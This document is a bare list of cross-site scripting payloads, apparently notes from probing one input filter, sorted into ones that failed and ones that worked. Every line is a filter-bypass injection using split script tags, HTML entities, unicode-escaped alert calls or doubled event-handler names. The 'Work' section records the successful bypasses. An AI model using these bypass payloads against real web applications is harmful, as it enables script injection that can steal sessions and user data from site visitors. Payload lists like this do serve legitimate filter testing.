--------------- Won't work ---------------
<scr<script>ipt>al\u0065rt(1)< /scr<script>ipt>
<scr&#105;pt>alert(1)</scr&#105;pt>
<ImG SrC=x OnErRoR=alErT(1)>
<script >al&#101;rt(1) </script >
<script >al'+'ert </script >
<select autofocus onfoc&#117;s=al&#101;rt(1) ><option>go</select>
<select autofocus onfo<!-- -->cus=alert(1)><option>go</select>    
<script >\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029</script >
<scr&#105;pt>al&#101;rt(1)</scr&#105;pt>
<script >al&#x65;rt(1)</script >
<select autofocus onfoc\u0075s=\u0061lert(1) ><option>go</select>
------------------ Work ------------------
<script >al\u0065rt(1)</script >
<scr<script>ipt>\u0061l\u0065rt(1)</scr<script>ipt >
<select autofocus ononfocus=focus=\u0061lert(1) ><option>go</select>